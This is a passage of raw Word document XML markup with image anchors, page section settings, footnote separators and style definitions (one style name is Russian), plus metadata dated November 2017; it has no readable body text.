            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2747010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2491740" cy="444839"/>
            <wp:effectExtent l="0" t="0" r="381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arejuli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1740" cy="444839"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00A2123C">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2633980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7764780" cy="995680"/>
            <wp:effectExtent l="0" t="0" r="762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t_carousel_5.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7764780" cy="995680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A2123C" w:rsidRPr="00C932FB" w:rsidSect="00992236">
      <w:headerReference w:type="even" r:id="rId10"/>
      <w:headerReference w:type="default" r:id="rId11"/>
      <w:footerReference w:type="even" r:id="rId12"/>
      <w:footerReference w:type="default" r:id="rId13"/>
      <w:headerReference w:type="first" r:id="rId14"/>
      <w:footerReference w:type="first" r:id="rId15"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="475" w:right="360" w:bottom="360" w:left="47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15EC" w:rsidRDefault="002415EC" w:rsidP="00F152F5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002415EC" w:rsidRDefault="002415EC" w:rsidP="00F1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52F5" w:rsidRDefault="00F152F5">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52F5" w:rsidRDefault="00F152F5">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52F5" w:rsidRDefault="00F152F5">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15EC" w:rsidRDefault="002415EC" w:rsidP="00F152F5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002415EC" w:rsidRDefault="002415EC" w:rsidP="00F152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52F5" w:rsidRDefault="00F152F5">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52F5" w:rsidRDefault="00F152F5">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52F5" w:rsidRDefault="00F152F5">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FD3DA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5AC3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updateFields w:val="true"/>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AE4"/>
    <w:rsid w:val="002415EC"/>
    <w:rsid w:val="002E508D"/>
    <w:rsid w:val="00525AE4"/>
    <w:rsid w:val="009605A0"/>
    <w:rsid w:val="00990990"/>
    <w:rsid w:val="00992236"/>
    <w:rsid w:val="00A2123C"/>
    <w:rsid w:val="00B822CF"/>
    <w:rsid w:val="00C932FB"/>
    <w:rsid w:val="00F152F5"/>
    <w:rsid w:val="00FC7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2FB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="a4">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00C93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Grid Table 1 Light"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="00C932F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5">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F152F5"/>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F152F5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F152F5"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F15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Words>
  <Characters>260</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2017-11-12T10:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-12T10:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>